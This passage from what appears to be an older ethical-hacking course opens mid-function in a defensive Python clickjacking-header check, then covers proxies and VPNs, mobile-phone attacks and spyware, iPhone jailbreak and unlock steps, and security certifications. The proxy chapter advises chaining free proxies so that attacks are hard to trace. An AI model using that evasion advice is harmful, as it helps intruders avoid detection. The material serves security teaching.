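        if "frame-ancestors" in directives:
            # when frame-ancestors is present it takes precedence over X-Frame-Options
            return any(_source_matches(s, framer_origin, page_origin)
                       for s in directives["frame-ancestors"])
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer_origin.lower() == page_origin.lower()
    # no header, or the obsolete ALLOW-FROM form that current browsers ignore
    return True


PAGE = "https://www.example.test"
ATTACKER = "https://gallery.attacker.test"
PARTNER = "https://app.partner.test"

if __name__ == "__main__":
    for label, headers in {
        "no headers": {},
        "X-Frame-Options: DENY": {"X-Frame-Options": "DENY"},
        "frame-ancestors 'self'": {"Content-Security-Policy": "frame-ancestors 'self'"},
    }.items():
        print(f"{label}: framable by {ATTACKER}? {may_be_framed(headers, PAGE, ATTACKER)}")
```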
Chapter 13
Proxy & VPN technology

Objectives:
Proxy technology
Introduction
Working of proxy server
Types of proxy server
Socks proxy
Free proxy servers
Use of proxies for attack
Tools
VPN
Introduction
Working of VPN
Types of VPN
Free VPN services
VPN tools
Proxy Technology
Introduction
A proxy server is a server that acts as an intermediary between an internal and an external host. A proxy server hides the computer from the outside network.

Working of Proxy Server
When an internal host requests a website, the request enters the proxy server; the proxy server modifies the header of the IP packet, reconstructs the data packet with a different IP address and sends it to the external host.

Types of Proxy Server
Caching Proxy Server: Caching is servicing the requests of clients with the help of saved contents from previous requests, without contacting the specified server.
Web Proxy Server: A proxy targeted at the World Wide Web is called a web proxy server.
Anonymizing Proxy Server: It tries to anonymize the web surfing.
Transparent Proxy Server: It doesn't modify the request and response beyond what is required for proxy authentication and identification. It works on port 80.
Non-Transparent Proxy Server: It is a proxy that modifies the request and response in order to add some services to the user agent.
Socks Proxy
SOCKS is an IETF standard. It is a proxy system which supports proxy-aware applications. Its package includes three components:
(1) A SOCKS server for the operating system.
(2) A client program like ftp, telnet etc.
(3) A client library for SOCKS.
The SOCKS proxy doesn't allow external components to collect information about the client which generated a request.

Free Proxy Servers
Attacking from thousands of proxy servers would be difficult to trace, and there are thousands of proxy servers available on the internet. Some websites which provide free proxy servers are below:
http://www.proxy4free.com/
http://spys.ru/en/
http://tools.rosinstrument.com/proxy/?rule1

Use of Proxies for attack
An attacker uses a chain of proxies for an attack; the IDS or firewall system installed at the victim server will always log the last proxy's IP address, which is why traceback is difficult.
Tools
AllegroSurf
It is a web accelerating, content filtering proxy server. It allows a user to share a single internet connection with the rest of the network while protecting users from unwanted content and increasing overall speed.
Download Link: http://www.downloadsofts.com/download/Servers/Firewall-ProxyServers/AllegroSurf-download-details.html

Proxy Manager
It connects to the internet and downloads lists of proxy servers from various websites. You will have thousands of proxy server IP addresses within a minute.
Download Link: http://www.brothersoft.com/proxy-manager-35000.html

Tor Proxy Chaining Software
Tor is a network of virtual tunnels connected together that works like a big chained proxy. It masks the identity of the originating computer from the internet. It is the best proxy tool ever made.
Download Link: https://www.torproject.org/download/download.html.en

JAP Proxy
JAP enables anonymous web surfing with any browser through the use of integrated proxy services that hide your real IP address.
Download Link: http://en.kioskea.net/download/download-3480-jap
VPN(Virtual Private Network) Introduction A virtual private network (VPN) is a network that uses primarily public telecommunication infrastructure, such as the Internet, to provide remote offices or traveling users access to a central organizational network. VPNs typically require remote users of the network to be authenticated, and often secure data with encryption technologies to prevent disclosure of private information to unauthorized parties.
Working of VPN
When internal server requests to transfer data to external host over the internet, VPN creates encrypted tunnel between internal server and external host while transferring data over the internet.
Types of VPN PPTP VPN(Dial-up VPN) A simple method for VPN is PPTP. It is a software based VPN system that uses your existing Internet connection. By using your existing Internet connection, a secure "tunnel" is created between two points allowing a remote user to connect to a remote network.
Site-to-site VPN Site-to-site is the same much the same thing as point-to-point except there is no "dedicated" line in use. Each site has its own internet connection which may not be from the same ISP or even the same type. One may have a T1 while the other only has DSL. Unlike point-to-point, the routers at both ends do all the work. They do all the routing and encryption.
Point-to-Point VPN A traditional VPN can also come as a point-to-point. These are also referred to as "leased-line VPNs." Simply put, two or more networks are connected using a dedicated line from an ISP. These lines can be packet or circuit switched. For example, T1's, Metro Ethernet, DS3, ATM or something else.
MPLS VPN
MPLS is a true "ISP-tuned" VPN. It requires two or more sites connected via the same ISP or an "on-net" connection. There is a way to configure this using different ISPs or "off-net", but you never get the same performance. I've tried... While it does use your existing Internet connection, tweaks are made by your ISP for performance and security.
Free VPN Services
A VPN protects user privacy over the internet. A few services on the internet provide free VPN access.
ProXPN
A free VPN service designed for use with Windows and Mac computers. ProXPN works through a small free application that you download and use to connect. The service is also compatible with the iPhone and other mobile phones that support VPN. Web: www.proxpn.com
GPass
The GPass service provides free VPN access as well as an impressively fast web proxy to use directly in your browser. The service is very popular in China, where internet censorship is commonplace. Web: http://gpass1.com/gpass/
CyberGhost
Offering 1GB of encrypted traffic per month on the free package, CyberGhost is another Windows-only VPN client. In order to use the service you are required to register for a free account, which unfortunately does not allow you to pick and choose your servers. Web: http://cyberghostvpn.com/en/surf-anonym.html
SecurityKiss
The free package provided by SecurityKiss brings you 300MB of data transfer per day, but provides an uncapped line with plenty of speed. You’ll need the SecurityKiss software to access the service, and this is only compatible with Windows. Web: http://www.securitykiss.com/
VPN Tools
VPN software brings the security of a private network to an insecure network, and allows you to access private local networks from anywhere. Some VPN tools that we can use to protect our privacy are listed below.
OpenVPN
OpenVPN is an open source VPN server that's easy to set up for use with open source VPN clients. You can easily export configuration files from OpenVPN to import into a variety of open source and commercial clients.
Download Link: http://www.openvpn.net/
LogMeIn Hamachi
Hamachi's strongest attribute is its ease of use. If you've read the other entries above and realized that you don't want a contract for a corporate VPN or the hassle of configuring a bunch of routers with open-source firmware packages, and you just want to set up a simple virtual network between you and your friend, your phone, or your office, Hamachi offers nearly instant deployment.
Download Link: http://www.logmeinhamachi.com/
Windows Built-In VPN
Windows has a built-in VPN client. Before exploring other client solutions, it's worth pulling up the quick launch box in the Windows start menu and typing "VPN" to start the configuration process. In Windows versions prior to Windows Vista, the built-in VPN client received a fair amount of criticism for lacking features and supported protocols.
Chapter 14
Hacking Handheld devices
Objectives:
Different OS in Mobile Phones
What can a hacker do with your mobile phone
Vulnerabilities in different mobile phones
Spywares
BlackBerry handheld devices
iPhone & iPod Jailbreaking
iPhone hacking using iFuntastic
Trojans & viruses
Mobile antivirus
Mobile phone security tips
Different OS in Mobile Phone
Windows Mobile
Symbian OS
BlackBerry OS
Apple iOS
What Can a Hacker DO with your mobile phone
Steal your information
Rob your money
Spy on you
Access your voice mails, messages etc.
Insert a virus
Vulnerabilities in different Mobile Phones
A format string vulnerability has been found in RIM's BlackBerry 7270; it allows a remote hacker to disable the phone's calling feature. The HTC Hytn running AGEPhone is vulnerable to malformed SIP messages sent over wireless LAN connections; this allows a remote hacker to disconnect active calls. A buffer overflow vulnerability in the Samsung SCH-i730 running the SJPhone SIP client allows an attacker to disable the phone and slow down the operating system.
Spyware:SymbOS/Htool-SMSSender.A.intd
It is a prototype malware application that targets Symbian OS. It sends copies of received SMS messages to the spyware author. Spyware:SymbOS/Htool-SMSSender.A.intd is distributed as "XaSMS.SIS". Both the source code and the SIS file are included in a RAR archive file named "HackSMS.rar". It copies the text of the last SMS message received, places it into a new SMS, and forwards the message to the spyware author.
Spyware:SymbOS/MultiDropper.CG
It is a spyware application that targets the Symbian operating system for mobile phones. The spyware application comes with a variant of the MultiDropper mobile phone Trojan. It tracks messages and copies log files containing the phone numbers of incoming and outgoing phone calls.
BlackBerry Handheld Device
The "Blackberry attack toolkit" together with the "BBproxy" software exploits the vulnerability of any company's website. BBproxy is security assessment software that allows proxy connections between the internet and an internal network. An "attack vector" tricks or links the user into downloading malicious software.
Blackjacking
The BBproxy tool is used for the Blackjacking attack. An attacker needs to install this tool on his BlackBerry device and then send it as an email attachment to the targets. The channel between the BlackBerry server and the handheld device is encrypted and can't be properly inspected by security products.
BlackBerry Wireless Security
The BlackBerry enterprise solution uses the AES and triple-DES encryption methods to encrypt data in transit. The BlackBerry enterprise solution is designed so that data remains encrypted during transit between the handheld device and the BlackBerry server.
Countermeasures
Clean the BlackBerry device memory.
Protect stored messages on the messaging server.
Encrypt the application password and storage on the BlackBerry device.
Use AES technology to secure the storage of the password keeper.
iPhone & iPod Jailbreaking
Jailbreaking is the process of unlocking an iPod or iPhone to allow the installation of third-party applications. It opens up your iPhone's filesystem so that it can be accessed from your computer.
Tools for Jailbreaking
There are a few tools available for iPhone jailbreaking.
iDemocracy
iDemocracy is an iPhone jailbreak and third-party app installer for the Windows platform. It installs Installer.app (for third-party apps and games) and simunlock.
Download Link: http://code.google.com/p/idemocracy/downloads/list
iActivator
It works on the Mac operating system, providing GUI tools for iPhone jailbreaking and activation/deactivation.
Download Link: http://www.filestube.com/c191b10600f1cfcd03ea,g/iActivator-v1-14.html
iFuntastic
iFuntastic is an iPhone modification and hacking tool. It has a full file browser feature, which simply browses the iPhone's internal file system, and it can edit UI images.
Download Link: http://ifuntastic.soft32.com/free-download
iPhone Hacking using iFuntastic
Prerequisites
An Intel Mac
The iPhone Hacking Kit
Your Mac and iPhone need to be connected to the same Wi-Fi network.
Steps to perform iPhone Hacking
Install iFuntastic in your Applications folder.
After installing, reboot your Mac safely.
Make sure your iPhone is on, then plug it into your Mac using the USB cable.
After iTunes launches, quit it.
Launch iFuntastic.
Press the Prepare button on the left side of the iFuntastic window.
Click the Jailbreak button at the bottom of the window.
On the next page of the window there are six steps; follow them. You will see the window as on the next slide.
Tool to unlock iPhone: anySIM
anySIM is a GUI-based unlocking system for the iPhone. It is for iPhones currently running OS v1.1.1, or iPhones that were upgraded from 1.0.2 to 1.1.1.
Steps for Unlocking your iPhone using AnySIM
Jailbreak your iPhone with software.
Set it up to install third-party applications.
Now download anySIM and expand the ZIP file.
Drag the resulting file "anySIM" (full name anySIM.app) to your /Applications folder.
Open Terminal (located in /Applications/Utilities) and type the following, replacing IPADDRESS with the IP address of your iPhone:
scp -r /Applications/anySIM.app root@IPADDRESS:/Applications/
Restart your iPhone.
Run the anySIM application to unlock your phone.
Trojans and Viruses
Cabir: Infects mobile phones running on Symbian OS. When a phone is infected, the message 'Caribe' is displayed on the phone's display and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals.
Duts: A parasitic file infector virus and is the first known virus for the PocketPC platform. It attempts to infect all EXE files in the current directory (infects files that are bigger than 4096 bytes).
Skulls: A trojan horse piece of code. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also will render all phone applications, including SMSes and MMSes useless.
Commwarrior: The first worm to use MMS messages in order to spread to other devices. It can spread through Bluetooth as well. It infects devices running Symbian OS Series 60. The executable worm file, once launched, hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices.
Antivirus
Kaspersky Antivirus
Kaspersky Anti-Virus Mobile protects smartphones from malicious programs that target mobile platforms.
Download Link: http://www.kaspersky.com/kaspersky_mobile_security
BitDefender Mobile Security
BitDefender Mobile Security provides antivirus protection for mobile devices running Symbian or Microsoft Windows Mobile.
Download Link: http://www.bitdefender.com/solutions/mobile-security-android.html
BullGuard Mobile Antivirus
BullGuard protects Pocket PCs and smartphones from malicious programs that target mobile platforms. It offers both on-demand and on-access scanning.
Download Link: http://www.bullguard.com/products/bullguard-mobile-security-10.aspx
Mobile Phone Security Tips
Keep your mobile antivirus updated.
When entering a crowded zone, make sure to switch off Bluetooth.
Do not open untrustworthy applications.
Do not pair with unknown devices.
Register the 15-digit IMEI number of your GSM handset.
Protect your device by setting up a Personal Identification Number (PIN).
Chapter 15
Career certification in IT Security
Objectives:
CompTIA
Cisco Systems
EC-Council
GIAC
ISACA
Offensive Security
(ISC)²
IT security certifications rose 3.1% in value over the past two years and 1.2% in value in the last six months. Certain types of security skills are seeing dramatic growth. A 27% rise in value was measured for the Certified Information Security Manager designation, just in the past six months. Brodkin reported on a survey carried out for the International Information Systems Security Certification Consortium, (ISC)², which showed "that holders of the CISSP, SSCP or CAP certifications who work in the Americas and have at least five years experience earn [an average of] $102,376 per year – more than $21,000 higher than IT pros who also have five years experience but lack the certifications." Several vendors working in the field of information security provide career certifications to candidates.
CompTIA
CompTIA is a provider of professional certifications for the information technology (IT) industry. CompTIA chairs and manages the Initiative for Software Choice. Certifications provided in information security are:
Security+
CSPA
Visit http://www.comptia.org/ for more details.
Cisco Systems
Cisco Systems also sponsors a line of IT Professional certifications for Cisco products. There are five levels of certification: Entry, Associate, Professional, Expert, and recently Architect, as well as eight different paths, Routing & Switching, Design, Network Security, Service Provider, the newly introduced Service Provider Operations, Storage Networking, Voice, and Wireless. Certifications in Information security:
CCNA Security
CCSP
CCIE Security
EC-Council
The EC-Council is best known for its professional certifications for the IT security field. It offers numerous certifications in a variety of fields related to IT security, including disaster recovery, secure programming, e-Business and general IT security knowledge. Some of the well-known EC-Council certifications are:
C|EH
C|HFI
E|CSA
LPT
ENSA
GIAC
GIAC (Global Information Assurance Certification) is an information security certification entity that specialises in technical and practical certification as well as new research in the form of its GIAC Gold program.
GSIF
GSEC
GCIA
ISACA
ISACA is an international professional association that deals with IT governance. It is an affiliate member of IFAC. Previously known as the Information Systems Audit and Control Association, ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.
CISA
CISM
Offensive Security
Offensive Security is a leading information security company that offers highly skilled training on information security products. It is the only vendor that offers real-time live training in information technology. It offers the following certification courses:
OSCP (Offensive Security Certified Professional)
OSEE (Offensive Security Exploitation Expert)
OSWE (Offensive Security Web Expert)
OSCE (Offensive Security Certified Expert)
OSWP (Offensive Security Wireless Professional)
(ISC)²
The International Information Systems Security Certification Consortium ((ISC)²) is a non-profit organization headquartered in Palm Harbor, Florida. The most widely known certification offered by the organization is the Certified Information Systems Security Professional (CISSP) certification. The organization maintains what it calls a Common Body of Knowledge for information security for the following certifications:
CISSP
ISSAP
SSAP
SSCP
List of Top 10 Highest Paying IT Certifications
According to recent salary surveys by ZDNet's TechRepublic, the following are the highest paying certifications to have in the technology industry. Following each certification is the average annual salary paid to the individual respondents who hold the certification. I have also listed training resources to learn more information about how to acquire each of the highest paying certifications.
1. PMI Project Management Professional (PMP)
With an average annual salary of $101,695, the PMP certification from the Project Management Institute (PMI) tops the list of highest paying certifications for the current year.
2. PMI Certified Associate in Project Management (CAPM)
Next highest on the list is PMI's Certified Associate in Project Management (CAPM). The average annual salary for the CAPM holders surveyed is $101,103.
3. ITIL v2 - Foundations
With an average annual salary of $95,415, the ITIL v2 Foundations certification came up third on the list. ITIL stands for the IT Infrastructure Library. The ITIL certification is designed to show expertise in ITIL service support and service delivery.
4. Certified Information Systems Security Professional (CISSP)
Coming in at a close 4th on the list is the Certified Information Systems Security Professional, or CISSP, certification from (ISC)². The average annual reported salary was $94,018.
5. Cisco CCIE Routing and Switching
At an average annual salary of $93,500, the Cisco CCIE Routing and Switching certification came in 5th on the list of highest paying certifications in the technology industry.
6. Cisco CCVP - Certified Voice Professional
Number six on the list is the Cisco CCVP, or Cisco Certified Voice Professional. The average annual salary of CCVP respondents was $88,824.
7. ITIL v3 - ITIL Master
The ITIL v3 certification, the ITIL Master, came in 7th on the list of the highest paying technical certifications. The average annual salary for ITIL Master certification holders was $86,600.
8. MCSD - Microsoft Certified Solution Developer
The MCSD, or Microsoft Certified Solution Developer, certification pays an average of $84,522. This puts the MCSD certification at number 8 on the list of highest paying certifications in technology.
9. Cisco CCNP - Cisco Certified Network Professional
The Cisco Certified Network Professional, or CCNP, certification is number 9 on the list of highest paying technical certifications. The average annual salary reported by CCNP holders is $84,161.
10. Red Hat Certified Engineer
The Red Hat Certified Engineer (RHCE) came in at number 10 on the list of highest paying certifications. The average annual salary reported by Red Hat Certified Engineers is $83,692.